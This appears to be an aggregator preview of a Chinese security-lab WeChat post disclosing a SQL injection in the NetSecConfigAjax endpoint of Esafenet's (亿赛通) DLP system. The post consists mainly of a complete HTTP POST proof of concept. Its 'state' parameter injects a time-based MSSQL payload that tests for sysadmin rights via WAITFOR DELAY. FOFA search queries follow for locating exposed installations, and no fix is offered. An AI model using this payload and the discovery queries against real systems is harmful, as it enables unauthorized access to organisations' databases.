【护网漏洞】亿赛通数据泄露防护(DLP)系统NetSecConfigAjax SQL注入

七芒星实验室 · 公众号 · · 2024-07-27 07:00

文章预览

影响范围亿赛通数据泄露防护(DLP)系统漏洞概述亿赛通数据泄露防护(DLP)系统NetSecConfigAjax SQL注入漏洞漏洞复现应用界面如下所示：漏洞POC如下所示： POST /CDGServer3/NetSecConfigAjax;Service HTTP/1.1 Host : x.x.x.x Upgrade-Insecure-Requests : 1 User-Agent : Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Accept : text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding : gzip, deflate Accept-Language : zh-CN,zh;q=0.9 Connection : close Content-Type : application/x-www-form-urlencoded Content-Length : 106 command=updateNetSec & state = 123 '%3bif+(select+IS_SRVROLEMEMBER(' sysadmin '))%3d1+WAITFOR+DELAY+' 0 %3a0%3a6 '-- 资产测绘 FOFA语法： body= "CDGServer3" || title= "电子文档安全管理系统" || cert= "esafenet" || body= "/help/getEditionInfo.jsp" || ………………………………

原文地址：访问原文地址
快照地址：访问文章快照
总结与预览地址：访问总结与预览

分享到微博

推荐文章

archrace 建筑竞赛 · 竞赛 | 2025 CLASSICS 轻奢设计大奖赛

昨天

gooood谷德设计网 · 孙轶家新作 | 林间梦田：上海田林公园的全天候都市生境建构

2 天前

gooood谷德设计网 · 戴卫奇普菲尔德新作｜上海外滩老市府改造

3 天前

archrace 建筑竞赛 · OMA、奇普菲尔德、Lina Ghotmeh 等入围大英博物馆西区改造设计竞赛【投票】

3 天前

新经销 · 经销商：不是把产品卖低价，而是低成本经营能力

6 月前